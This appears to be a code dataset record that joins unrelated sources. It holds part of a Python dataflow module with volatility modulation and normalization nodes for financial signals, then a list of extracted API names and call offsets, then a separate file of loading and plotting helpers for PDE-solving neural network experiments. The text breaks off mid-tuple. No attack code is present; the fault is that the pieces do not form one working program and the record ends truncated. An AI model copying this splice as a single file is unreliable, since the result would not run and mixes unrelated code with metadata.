df = SeriesToDfColProcessor.preprocess(df_in, self._in_col_group)
dfs, info = self._fit_predict_volatility_model(
df, fit=fit, out_col_prefix=self._out_col_prefix
)
df_out = SeriesToDfColProcessor.postprocess(dfs, self._out_col_group)
df_out = cdu.merge_dataframes(df_in, df_out)
method = "fit" if fit else "predict"
self._set_info(method, info)
return {"df_out": df_out}
class VolatilityModulator(FitPredictNode, ColModeMixin):
"""
Modulate or demodulate signal by volatility.
Processing steps:
- shift volatility to align it with signal
- multiply/divide signal by volatility
Usage examples:
- Z-scoring
- to obtain volatility prediction, pass in returns into `SmaModel` with
a `steps_ahead` parameter
- to z-score, pass in signal, volatility prediction, `signal_steps_ahead=0`,
`volatility_steps_ahead=steps_ahead`, `mode='demodulate'`
- Undoing z-scoring
- Let's say we have
- forward volatility prediction `n` steps ahead
- prediction of forward z-scored returns `m` steps ahead. Z-scoring
for the target has been done using the volatility prediction above
- To undo z-scoring, we need to pass in the prediction of forward
z-scored returns, forward volatility prediction, `signal_steps_ahead=n`,
`volatility_steps_ahead=m`, `mode='modulate'`
"""
def __init__(
self,
nid: str,
signal_cols: _TO_LIST_MIXIN_TYPE,
volatility_col: _COL_TYPE,
signal_steps_ahead: int,
volatility_steps_ahead: int,
mode: str,
col_rename_func: Optional[Callable[[Any], Any]] = None,
col_mode: Optional[str] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
:param nid: node identifier
:param signal_cols: names of columns to (de)modulate
:param volatility_col: name of volatility column
:param signal_steps_ahead: steps ahead of the signal columns. If signal
is at `t_0`, this value should be `0`. If signal is a forward
prediction of z-scored returns indexed by knowledge time, this
value should be equal to the number of steps of the prediction
:param volatility_steps_ahead: steps ahead of the volatility column. If
volatility column is an output of `SmaModel`, this corresponds to
the `steps_ahead` parameter
:param mode: "modulate" or "demodulate"
:param col_rename_func: as in `ColumnTransformer`
:param col_mode: as in `ColumnTransformer`
"""
super().__init__(nid)
self._signal_cols = cdu.convert_to_list(signal_cols)
self._volatility_col = volatility_col
dbg.dassert_lte(0, signal_steps_ahead)
self._signal_steps_ahead = signal_steps_ahead
dbg.dassert_lte(0, volatility_steps_ahead)
self._volatility_steps_ahead = volatility_steps_ahead
dbg.dassert_in(mode, ["modulate", "demodulate"])
self._mode = mode
self._col_rename_func = col_rename_func or (lambda x: x)
self._col_mode = col_mode or "replace_all"
self._nan_mode = nan_mode or "leave_unchanged"
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
df_out = self._process_signal(df_in)
info = collections.OrderedDict()
info["df_out_info"] = cdu.get_df_info_as_string(df_out)
self._set_info("fit", info)
return {"df_out": df_out}
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
df_out = self._process_signal(df_in)
info = collections.OrderedDict()
info["df_out_info"] = cdu.get_df_info_as_string(df_out)
self._set_info("predict", info)
return {"df_out": df_out}
def _process_signal(self, df_in: pd.DataFrame) -> pd.DataFrame:
"""
Modulate or demodulate signal by volatility prediction.
:param df_in: dataframe with `self._signal_cols` and
`self._volatility_col` columns
:return: adjusted signal indexed in the same way as the input signal
"""
dbg.dassert_is_subset(self._signal_cols, df_in.columns.tolist())
dbg.dassert_in(self._volatility_col, df_in.columns)
fwd_signal = df_in[self._signal_cols]
fwd_volatility = df_in[self._volatility_col]
# Shift volatility to align it with signal.
volatility_shift = self._volatility_steps_ahead - self._signal_steps_ahead
if self._nan_mode == "drop":
fwd_volatility = fwd_volatility.dropna()
elif self._nan_mode == "leave_unchanged":
pass
else:
raise ValueError(f"Unrecognized `nan_mode` {self._nan_mode}")
volatility_aligned = fwd_volatility.shift(volatility_shift)
# Adjust signal by volatility.
if self._mode == "demodulate":
adjusted_signal = fwd_signal.divide(volatility_aligned, axis=0)
elif self._mode == "modulate":
adjusted_signal = fwd_signal.multiply(volatility_aligned, axis=0)
else:
raise ValueError(f"Invalid mode=`{self._mode}`")
df_out = self._apply_col_mode(
df_in,
adjusted_signal,
cols=self._signal_cols,
col_rename_func=self._col_rename_func,
col_mode=self._col_mode,
)
return df_out
class VolatilityNormalizer(FitPredictNode, ColModeMixin):
def __init__(
self,
nid: str,
col: str,
target_volatility: float,
col_mode: Optional[str] = None,
) -> None:
"""
Normalize series to target annual volatility.
:param nid: node identifier
:param col: name of column to rescale
:param target_volatility: target volatility as a proportion
:param col_mode: `merge_all` or `replace_all`. If `replace_all`, return
only the rescaled column, if `merge_all`, append the rescaled
column to input dataframe
"""
super().__init__(nid)
self._col = col
self._target_volatility = target_volatility
self._col_mode = col_mode or "merge_all"
dbg.dassert_in(
self._col_mode,
["merge_all", "replace_all"],
"Invalid `col_mode`='%s'",
self._col_mode,
)
self._scale_factor: Optional[float] = None
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
dbg.dassert_in(self._col, df_in.columns)
self._scale_factor = cfinan.compute_volatility_normalization_factor(
df_in[self._col], self._target_volatility
)
rescaled_y_hat = self._scale_factor * df_in[self._col]
df_out = self._apply_col_mode(
df_in,
rescaled_y_hat.to_frame(),
cols=[self._col],
col_rename_func=lambda x: f"rescaled_{x}",
col_mode=self._col_mode,
)
# Store info.
info = collections.OrderedDict()
info["scale_factor"] = self._scale_factor
self._set_info("fit", info)
return {"df_out": df_out}
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
dbg.dassert_in(self._col, df_in.columns)
rescaled_y_hat = self._scale_factor * df_in[self._col]
df_out = self._apply_col_mode(
df_in,
rescaled_y_hat.to_frame(),
cols=[self._col],
col_rename_func=lambda x: f"rescaled_{x}",
col_mode=self._col_mode,
)
return {"df_out": df_out}
|
[
"logging.getLogger",
"helpers.dbg.dassert_in",
"core.dataflow.nodes.sources.ReadDataFromDf",
"helpers.dbg.dassert_is_not",
"core.dataflow.utils.get_x_and_forward_y_fit_df",
"core.dataflow.utils.merge_dataframes",
"core.data_adapters.transform_to_sklearn",
"core.dataflow.visitors.extract_info",
"helpers.dbg.dassert_lte",
"core.dataflow.nodes.base.SeriesToDfColProcessor.preprocess",
"core.dataflow.utils.convert_to_list",
"core.dataflow.nodes.base.SeriesToDfColProcessor.postprocess",
"core.dataflow.utils.get_df_info_as_string",
"core.dataflow.utils.validate_df_indices",
"numpy.rint",
"scipy.optimize.minimize_scalar",
"core.data_adapters.transform_from_sklearn",
"helpers.dbg.dassert",
"helpers.dbg.dassert_not_in",
"numpy.abs",
"collections.OrderedDict",
"helpers.dbg.dassert_no_duplicates",
"helpers.dbg.dassert_isinstance",
"core.finance.compute_volatility_normalization_factor",
"core.dataflow.utils.get_forward_cols",
"core.signal_processing.compute_smooth_moving_average",
"core.dataflow.core.DAG"
] |
[((755, 782), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (772, 782), False, 'import logging\n'), ((2076, 2100), 'core.dataflow.utils.convert_to_list', 'cdu.convert_to_list', (['col'], {}), '(col)\n', (2095, 2100), True, 'import core.dataflow.utils as cdu\n'), ((2191, 2280), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(0)', 'self._steps_ahead', '"""Non-causal prediction attempted! Aborting..."""'], {}), "(0, self._steps_ahead,\n 'Non-causal prediction attempted! Aborting...')\n", (2206, 2280), True, 'import helpers.dbg as dbg\n'), ((2476, 2536), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['self._col_mode', "['replace_all', 'merge_all']"], {}), "(self._col_mode, ['replace_all', 'merge_all'])\n", (2490, 2536), True, 'import helpers.dbg as dbg\n'), ((3013, 3085), 'core.dataflow.utils.get_x_and_forward_y_fit_df', 'cdu.get_x_and_forward_y_fit_df', (['df_in', 'x_vars', 'y_vars', 'self._steps_ahead'], {}), '(df_in, x_vars, y_vars, self._steps_ahead)\n', (3043, 3085), True, 'import core.dataflow.utils as cdu\n'), ((3939, 3969), 'core.dataflow.utils.validate_df_indices', 'cdu.validate_df_indices', (['df_in'], {}), '(df_in)\n', (3962, 3969), True, 'import core.dataflow.utils as cdu\n'), ((4294, 4390), 'helpers.dbg.dassert_is_not', 'dbg.dassert_is_not', (['self._tau', 'None', '"""Parameter tau not found! Check if `fit` has been run."""'], {}), "(self._tau, None,\n 'Parameter tau not found! Check if `fit` has been run.')\n", (4312, 4390), True, 'import helpers.dbg as dbg\n'), ((5057, 5119), 'core.data_adapters.transform_to_sklearn', 'cdataa.transform_to_sklearn', (['df_in.loc[non_nan_idx]', 'self._col'], {}), '(df_in.loc[non_nan_idx], self._col)\n', (5084, 5119), True, 'import core.data_adapters as cdataa\n'), ((5183, 5240), 'core.dataflow.utils.get_forward_cols', 'cdu.get_forward_cols', (['df_in', 'self._col', 'self._steps_ahead'], {}), '(df_in, self._col, self._steps_ahead)\n', (5203, 5240), True, 'import core.dataflow.utils as cdu\n'), ((5438, 5507), 'core.data_adapters.transform_from_sklearn', 'cdataa.transform_from_sklearn', (['non_nan_idx', 'fwd_y_hat_vars', 'fwd_y_hat'], {}), '(non_nan_idx, fwd_y_hat_vars, fwd_y_hat)\n', (5467, 5507), True, 'import core.data_adapters as cdataa\n'), ((5710, 5751), 'helpers.dbg.dassert_no_duplicates', 'dbg.dassert_no_duplicates', (['df_out.columns'], {}), '(df_out.columns)\n', (5735, 5751), True, 'import helpers.dbg as dbg\n'), ((5945, 5970), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (5968, 5970), False, 'import collections\n'), ((6096, 6129), 'core.dataflow.utils.get_df_info_as_string', 'cdu.get_df_info_as_string', (['df_out'], {}), '(df_out)\n', (6121, 6129), True, 'import core.dataflow.utils as cdu\n'), ((7570, 7647), 'scipy.optimize.minimize_scalar', 'sp.optimize.minimize_scalar', (['score'], {'method': '"""bounded"""', 'bounds': '[tau_lb, tau_ub]'}), "(score, method='bounded', bounds=[tau_lb, tau_ub])\n", (7597, 7647), True, 'import scipy as sp\n'), ((8367, 8509), 'core.signal_processing.compute_smooth_moving_average', 'csigna.compute_smooth_moving_average', (['x_srs'], {'tau': 'self._tau', 'min_periods': 'min_periods', 'min_depth': 'self._min_depth', 'max_depth': 'self._max_depth'}), '(x_srs, tau=self._tau, min_periods=\n min_periods, min_depth=self._min_depth, max_depth=self._max_depth)\n', (8403, 8509), True, 'import core.signal_processing as csigna\n'), ((9142, 9170), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(1)', 'p_moment'], {}), '(1, p_moment)\n', (9157, 9170), True, 'import helpers.dbg as dbg\n'), ((10288, 10313), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (10311, 10313), False, 'import collections\n'), ((10396, 10444), 'helpers.dbg.dassert_not_in', 'dbg.dassert_not_in', (["(name + '_vol')", 'df_in.columns'], {}), "(name + '_vol', df_in.columns)\n", (10414, 10444), True, 'import helpers.dbg as dbg\n'), ((10891, 10916), 'core.dataflow.visitors.extract_info', 'extract_info', (['dag', '[mode]'], {}), '(dag, [mode])\n', (10903, 10916), False, 'from core.dataflow.visitors import extract_info\n'), ((13514, 13532), 'core.dataflow.core.DAG', 'DAG', ([], {'mode': '"""strict"""'}), "(mode='strict')\n", (13517, 13532), False, 'from core.dataflow.core import DAG, Node\n'), ((13631, 13657), 'core.dataflow.nodes.sources.ReadDataFromDf', 'ReadDataFromDf', (['nid', 'df_in'], {}), '(nid, df_in)\n', (13645, 13657), False, 'from core.dataflow.nodes.sources import ReadDataFromDf\n'), ((15367, 15392), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (15390, 15392), False, 'import collections\n'), ((18019, 18047), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(1)', 'p_moment'], {}), '(1, p_moment)\n', (18034, 18047), True, 'import helpers.dbg as dbg\n'), ((18152, 18187), 'helpers.dbg.dassert', 'dbg.dassert', (['(tau is None or tau > 0)'], {}), '(tau is None or tau > 0)\n', (18163, 18187), True, 'import helpers.dbg as dbg\n'), ((19268, 19298), 'core.dataflow.utils.validate_df_indices', 'cdu.validate_df_indices', (['df_in'], {}), '(df_in)\n', (19291, 19298), True, 'import core.dataflow.utils as cdu\n'), ((20874, 20917), 'helpers.dbg.dassert_isinstance', 'dbg.dassert_isinstance', (['in_col_group', 'tuple'], {}), '(in_col_group, tuple)\n', (20896, 20917), True, 'import helpers.dbg as dbg\n'), ((21119, 21147), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(1)', 'p_moment'], {}), '(1, p_moment)\n', (21134, 21147), True, 'import helpers.dbg as dbg\n'), ((22048, 22078), 'core.dataflow.utils.validate_df_indices', 'cdu.validate_df_indices', (['df_in'], {}), '(df_in)\n', (22071, 22078), True, 'import core.dataflow.utils as cdu\n'), ((22092, 22152), 'core.dataflow.nodes.base.SeriesToDfColProcessor.preprocess', 'SeriesToDfColProcessor.preprocess', (['df_in', 'self._in_col_group'], {}), '(df_in, self._in_col_group)\n', (22125, 22152), False, 'from core.dataflow.nodes.base import ColModeMixin, FitPredictNode, SeriesToDfColProcessor\n'), ((22297, 22357), 'core.dataflow.nodes.base.SeriesToDfColProcessor.postprocess', 'SeriesToDfColProcessor.postprocess', (['dfs', 'self._out_col_group'], {}), '(dfs, self._out_col_group)\n', (22331, 22357), False, 'from core.dataflow.nodes.base import ColModeMixin, FitPredictNode, SeriesToDfColProcessor\n'), ((22375, 22410), 'core.dataflow.utils.merge_dataframes', 'cdu.merge_dataframes', (['df_in', 'df_out'], {}), '(df_in, df_out)\n', (22395, 22410), True, 'import core.dataflow.utils as cdu\n'), ((24829, 24861), 'core.dataflow.utils.convert_to_list', 'cdu.convert_to_list', (['signal_cols'], {}), '(signal_cols)\n', (24848, 24861), True, 'import core.dataflow.utils as cdu\n'), ((24916, 24954), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(0)', 'signal_steps_ahead'], {}), '(0, signal_steps_ahead)\n', (24931, 24954), True, 'import helpers.dbg as dbg\n'), ((25017, 25059), 'helpers.dbg.dassert_lte', 'dbg.dassert_lte', (['(0)', 'volatility_steps_ahead'], {}), '(0, volatility_steps_ahead)\n', (25032, 25059), True, 'import helpers.dbg as dbg\n'), ((25130, 25178), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['mode', "['modulate', 'demodulate']"], {}), "(mode, ['modulate', 'demodulate'])\n", (25144, 25178), True, 'import helpers.dbg as dbg\n'), ((25504, 25529), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (25527, 25529), False, 'import collections\n'), ((25560, 25593), 'core.dataflow.utils.get_df_info_as_string', 'cdu.get_df_info_as_string', (['df_out'], {}), '(df_out)\n', (25585, 25593), True, 'import core.dataflow.utils as cdu\n'), ((25796, 25821), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (25819, 25821), False, 'import collections\n'), ((25852, 25885), 'core.dataflow.utils.get_df_info_as_string', 'cdu.get_df_info_as_string', (['df_out'], {}), '(df_out)\n', (25877, 25885), True, 'import core.dataflow.utils as cdu\n'), ((26380, 26431), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['self._volatility_col', 'df_in.columns'], {}), '(self._volatility_col, df_in.columns)\n', (26394, 26431), True, 'import helpers.dbg as dbg\n'), ((28369, 28476), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['self._col_mode', "['merge_all', 'replace_all']", '"""Invalid `col_mode`=\'%s\'"""', 'self._col_mode'], {}), '(self._col_mode, [\'merge_all\', \'replace_all\'],\n "Invalid `col_mode`=\'%s\'", self._col_mode)\n', (28383, 28476), True, 'import helpers.dbg as dbg\n'), ((28659, 28699), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['self._col', 'df_in.columns'], {}), '(self._col, df_in.columns)\n', (28673, 28699), True, 'import helpers.dbg as dbg\n'), ((28729, 28823), 'core.finance.compute_volatility_normalization_factor', 'cfinan.compute_volatility_normalization_factor', (['df_in[self._col]', 'self._target_volatility'], {}), '(df_in[self._col], self.\n _target_volatility)\n', (28775, 28823), True, 'import core.finance as cfinan\n'), ((29170, 29195), 'collections.OrderedDict', 'collections.OrderedDict', ([], {}), '()\n', (29193, 29195), False, 'import collections\n'), ((29396, 29436), 'helpers.dbg.dassert_in', 'dbg.dassert_in', (['self._col', 'df_in.columns'], {}), '(self._col, df_in.columns)\n', (29410, 29436), True, 'import helpers.dbg as dbg\n'), ((3633, 3675), 'core.data_adapters.transform_to_sklearn', 'cdataa.transform_to_sklearn', (['df', 'self._col'], {}), '(df, self._col)\n', (3660, 3675), True, 'import core.data_adapters as cdataa\n'), ((6941, 7066), 'core.signal_processing.compute_smooth_moving_average', 'csigna.compute_smooth_moving_average', (['x_srs'], {'tau': 'tau', 'min_periods': '(0)', 'min_depth': 'self._min_depth', 'max_depth': 'self._max_depth'}), '(x_srs, tau=tau, min_periods=0,\n min_depth=self._min_depth, max_depth=self._max_depth)\n', (6977, 7066), True, 'import core.signal_processing as csigna\n'), ((8049, 8085), 'numpy.rint', 'np.rint', (['(self._min_tau_periods * tau)'], {}), '(self._min_tau_periods * tau)\n', (8056, 8085), True, 'import numpy as np\n'), ((8257, 8299), 'numpy.rint', 'np.rint', (['(self._min_tau_periods * self._tau)'], {}), '(self._min_tau_periods * self._tau)\n', (8264, 8299), True, 'import numpy as np\n'), ((13886, 13895), 'numpy.abs', 'np.abs', (['x'], {}), '(x)\n', (13892, 13895), True, 'import numpy as np\n'), ((14424, 14433), 'numpy.abs', 'np.abs', (['x'], {}), '(x)\n', (14430, 14433), True, 'import numpy as np\n')]
|
# Data processing imports
import scipy.io as io
import numpy as np
from pyDOE import lhs
# Plotting imports
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from scipy.interpolate import griddata
import matplotlib.gridspec as gridspec
def load_dataset(file):
data = io.loadmat(file)
return data['x'], data['t'], data['usol'].T
# Inference
def preprocess_data_discrete_inference(file, idx_t0, idx_t1, q = 500, N = 250, noise = 0.0):
x, t, u_exact = load_dataset(file)
X, T = np.meshgrid(x, t)
test_X = x
test_u = u_exact[idx_t1, :]
# Compute domain bounds for x
lb = test_X.min(0)
ub = test_X.max(0)
# Determine dt
dt = t[idx_t1] - t[idx_t0]
# Sampling for initial step
idx_x = np.random.choice(x.shape[0], N, replace = False)
x0 = x[idx_x,:]
u0 = u_exact[idx_t0:idx_t0+1, idx_x].T
u0 = u0 + noise*np.std(u0)*np.random.randn(u0.shape[0], u0.shape[1])
x1 = np.vstack([lb, ub])
tmp = np.float32(np.loadtxt(f'IRK_weights/Butcher_IRK{q}.txt', ndmin = 2))
IRK_weights = np.reshape(tmp[:q**2+q], (q+1,q))
return x, t, u_exact, T, lb, ub, dt, x0, u0, x1, test_X, test_u, IRK_weights
def plot_results_discrete_inference(x, t, x0, u0, u_exact, test_X, u1_pred, idx_t0, idx_t1, lb, ub):
fig = plt.figure(figsize = (10, 9.5))
ax = plt.gca()
ax.axis('off')
fig.patch.set_facecolor('white')
####### Row 0: h(t,x) ##################
gs0 = gridspec.GridSpec(1, 2)
gs0.update(top=1-0.06, bottom=1-1/2 + 0.1, left=0.15, right=0.85, wspace=0)
ax = plt.subplot(gs0[:, :])
h = ax.imshow(u_exact.T, interpolation='nearest', cmap='rainbow',
extent=[t.min(), t.max(), test_X.min(), test_X.max()],
origin='lower', aspect='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
line = np.linspace(x.min(), x.max(), 2)[:,None]
ax.plot(t[idx_t0]*np.ones((2,1)), line, 'w-', linewidth = 1)
ax.plot(t[idx_t1]*np.ones((2,1)), line, 'w-', linewidth = 1)
ax.set_xlabel('$t$')
ax.set_ylabel('$x$')
ax.set_title('$u(t,x)$', fontsize = 10)
####### Row 1: h(t,x) slices ##################
gs1 = gridspec.GridSpec(1, 2)
gs1.update(top=1-1/2-0.05, bottom=0.15, left=0.15, right=0.85, wspace=0.5)
ax = plt.subplot(gs1[0, 0])
ax.plot(x,u_exact[idx_t0,:], 'b-', linewidth = 2)
ax.plot(x0, u0, 'rx', linewidth = 2, label = 'Data')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
ax.set_title('$t = %.2f$' % (t[idx_t0]), fontsize = 10)
ax.set_xlim([lb-0.1, ub+0.1])
ax.legend(loc='upper center', bbox_to_anchor=(0.8, -0.3), ncol=2, frameon=False)
ax = plt.subplot(gs1[0, 1])
ax.plot(x,u_exact[idx_t1,:], 'b-', linewidth = 2, label = 'Exact')
ax.plot(test_X, u1_pred[:,-1], 'r--', linewidth = 2, label = 'Prediction')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
ax.set_title('$t = %.2f$' % (t[idx_t1]), fontsize = 10)
ax.set_xlim([lb-0.1, ub+0.1])
ax.legend(loc='upper center', bbox_to_anchor=(0.1, -0.3), ncol=2, frameon=False)
plt.show()
# Identification
def preprocess_data_discrete_identification(file, idx_t0, idx_t1, N0 = 250, N1 = 250, noise = 0.0):
x, t, u_exact = load_dataset(file)
# Compute domain bounds for x
lb = x.min(0)
ub = x.max(0)
# Determine dt
dt = t[idx_t1] - t[idx_t0]
# Determine q
q = int(np.ceil(0.5*np.log(np.finfo(float).eps)/np.log(dt)))
# Sampling for initial step
idx_x = np.random.choice(x.shape[0], N0, replace = False)
x0 = x[idx_x,:]
u0 = u_exact[idx_t0:idx_t0+1, idx_x].T
u0 = u0 + noise*np.std(u0)*np.random.randn(u0.shape[0], u0.shape[1])
# Sampling for final step
idx_x = np.random.choice(x.shape[0], N1, replace = False)
x1 = x[idx_x,:]
u1 = u_exact[idx_t1:idx_t1+1, idx_x].T
u1 = u1 + noise*np.std(u1)*np.random.randn(u1.shape[0], u1.shape[1])
tmp = np.float32(np.loadtxt(f'IRK_weights/Butcher_IRK{q}.txt', ndmin = 2))
IRK_weights = np.reshape(tmp[:q**2+q], (q+1,q))
IRK_alphas = IRK_weights[:-1,:]
IRK_betas = IRK_weights[-1:,:]
return x, t, u_exact, lb, ub, dt, q, x0, u0, x1, u1, IRK_alphas, IRK_betas
def plot_results_discrete_identification(x, t, x0, x1, u_exact, u0, u1, idx_t0, idx_t1, lb, ub, lambda_1, lambda_2):
fig = plt.figure(figsize = (10, 9.5))
ax = plt.gca()
ax.axis('off')
fig.patch.set_facecolor('white')
gs0 = gridspec.GridSpec(1, 2)
gs0.update(top=1-0.06, bottom=1-1/3+0.05, left=0.15, right=0.85, wspace=0)
ax = plt.subplot(gs0[:, :])
h = ax.imshow(u_exact.T, interpolation='nearest', cmap='rainbow',
extent=[t.min(),t.max(), lb[0], ub[0]],
origin='lower', aspect='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
line = np.linspace(x.min(), x.max(), 2)[:,None]
ax.plot(t[idx_t0]*np.ones((2,1)), line, 'w-', linewidth = 1.0)
ax.plot(t[idx_t1]*np.ones((2,1)), line, 'w-', linewidth = 1.0)
ax.set_xlabel('$t$')
ax.set_ylabel('$x$')
ax.set_title('$u(t,x)$', fontsize = 10)
gs1 = gridspec.GridSpec(1, 2)
gs1.update(top=1-1/3-0.1, bottom=1-2/3, left=0.15, right=0.85, wspace=0.5)
ax = plt.subplot(gs1[0, 0])
ax.plot(x, u_exact[idx_t0,:][:,None], 'b', linewidth = 2, label = 'Exact')
ax.plot(x0, u0, 'rx', linewidth = 2, label = 'Data')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
ax.set_title('$t = %.2f$\n%d trainng data' % (t[idx_t0], u0.shape[0]), fontsize = 10)
ax = plt.subplot(gs1[0, 1])
ax.plot(x, u_exact[idx_t1,:][:,None], 'b', linewidth = 2, label = 'Exact')
ax.plot(x1, u1, 'rx', linewidth = 2, label = 'Data')
ax.set_xlabel('$x$')
ax.set_ylabel('$u(t,x)$')
ax.set_title('$t = %.2f$\n%d trainng data' % (t[idx_t1], u1.shape[0]), fontsize = 10)
ax.legend(loc='upper center', bbox_to_anchor=(-0.3, -0.3), ncol=2, frameon=False)
gs2 = gridspec.GridSpec(1, 2)
gs2.update(top=1-2/3-0.05, bottom=0, left=0.15, right=0.85, wspace=0.0)
ax = plt.subplot(gs2[0, 0])
ax.axis('off')
ax.text(0.5,0.5,f'Correct PDE: $u_t + u u_x - 0.0031831 u_{{xx}} = 0$ \n$\lambda_1$: {lambda_1:.5f} \t\t $\lambda_2$: {lambda_2:.5f}')
plt.show()
|
[
"numpy.reshape",
"numpy.ones",
"numpy.random.choice",
"matplotlib.pyplot.gca",
"scipy.io.loadmat",
"numpy.log",
"matplotlib.pyplot.figure",
"matplotlib.gridspec.GridSpec",
"numpy.random.randn",
"numpy.vstack",
"mpl_toolkits.axes_grid1.make_axes_locatable",
"numpy.std",
"numpy.finfo",
"numpy.meshgrid",
"numpy.loadtxt",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.show"
] |
[((311, 327), 'scipy.io.loadmat', 'io.loadmat', (['file'], {}), '(file)\n', (321, 327), True, 'import scipy.io as io\n'), ((533, 550), 'numpy.meshgrid', 'np.meshgrid', (['x', 't'], {}), '(x, t)\n', (544, 550), True, 'import numpy as np\n'), ((787, 833), 'numpy.random.choice', 'np.random.choice', (['x.shape[0]', 'N'], {'replace': '(False)'}), '(x.shape[0], N, replace=False)\n', (803, 833), True, 'import numpy as np\n'), ((982, 1001), 'numpy.vstack', 'np.vstack', (['[lb, ub]'], {}), '([lb, ub])\n', (991, 1001), True, 'import numpy as np\n'), ((1104, 1144), 'numpy.reshape', 'np.reshape', (['tmp[:q ** 2 + q]', '(q + 1, q)'], {}), '(tmp[:q ** 2 + q], (q + 1, q))\n', (1114, 1144), True, 'import numpy as np\n'), ((1331, 1360), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 9.5)'}), '(figsize=(10, 9.5))\n', (1341, 1360), True, 'import matplotlib.pyplot as plt\n'), ((1372, 1381), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1379, 1381), True, 'import matplotlib.pyplot as plt\n'), ((1498, 1521), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {}), '(1, 2)\n', (1515, 1521), True, 'import matplotlib.gridspec as gridspec\n'), ((1611, 1633), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs0[:, :]'], {}), '(gs0[:, :])\n', (1622, 1633), True, 'import matplotlib.pyplot as plt\n'), ((1847, 1870), 'mpl_toolkits.axes_grid1.make_axes_locatable', 'make_axes_locatable', (['ax'], {}), '(ax)\n', (1866, 1870), False, 'from mpl_toolkits.axes_grid1 import make_axes_locatable\n'), ((2331, 2354), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {}), '(1, 2)\n', (2348, 2354), True, 'import matplotlib.gridspec as gridspec\n'), ((2448, 2470), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs1[0, 0]'], {}), '(gs1[0, 0])\n', (2459, 2470), True, 'import matplotlib.pyplot as plt\n'), ((2837, 2859), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs1[0, 1]'], {}), '(gs1[0, 1])\n', (2848, 2859), True, 'import matplotlib.pyplot as plt\n'), ((3268, 3278), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3276, 3278), True, 'import matplotlib.pyplot as plt\n'), ((3713, 3760), 'numpy.random.choice', 'np.random.choice', (['x.shape[0]', 'N0'], {'replace': '(False)'}), '(x.shape[0], N0, replace=False)\n', (3729, 3760), True, 'import numpy as np\n'), ((3946, 3993), 'numpy.random.choice', 'np.random.choice', (['x.shape[0]', 'N1'], {'replace': '(False)'}), '(x.shape[0], N1, replace=False)\n', (3962, 3993), True, 'import numpy as np\n'), ((4234, 4274), 'numpy.reshape', 'np.reshape', (['tmp[:q ** 2 + q]', '(q + 1, q)'], {}), '(tmp[:q ** 2 + q], (q + 1, q))\n', (4244, 4274), True, 'import numpy as np\n'), ((4552, 4581), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 9.5)'}), '(figsize=(10, 9.5))\n', (4562, 4581), True, 'import matplotlib.pyplot as plt\n'), ((4593, 4602), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (4600, 4602), True, 'import matplotlib.pyplot as plt\n'), ((4674, 4697), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {}), '(1, 2)\n', (4691, 4697), True, 'import matplotlib.gridspec as gridspec\n'), ((4786, 4808), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs0[:, :]'], {}), '(gs0[:, :])\n', (4797, 4808), True, 'import matplotlib.pyplot as plt\n'), ((5009, 5032), 'mpl_toolkits.axes_grid1.make_axes_locatable', 'make_axes_locatable', (['ax'], {}), '(ax)\n', (5028, 5032), False, 'from mpl_toolkits.axes_grid1 import make_axes_locatable\n'), ((5426, 5449), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {}), '(1, 2)\n', (5443, 5449), True, 'import matplotlib.gridspec as gridspec\n'), ((5539, 5561), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs1[0, 0]'], {}), '(gs1[0, 0])\n', (5550, 5561), True, 'import matplotlib.pyplot as plt\n'), ((5857, 5879), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs1[0, 1]'], {}), '(gs1[0, 1])\n', (5868, 5879), True, 'import matplotlib.pyplot as plt\n'), ((6262, 6285), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {}), '(1, 2)\n', (6279, 6285), True, 'import matplotlib.gridspec as gridspec\n'), ((6376, 6398), 'matplotlib.pyplot.subplot', 'plt.subplot', (['gs2[0, 0]'], {}), '(gs2[0, 0])\n', (6387, 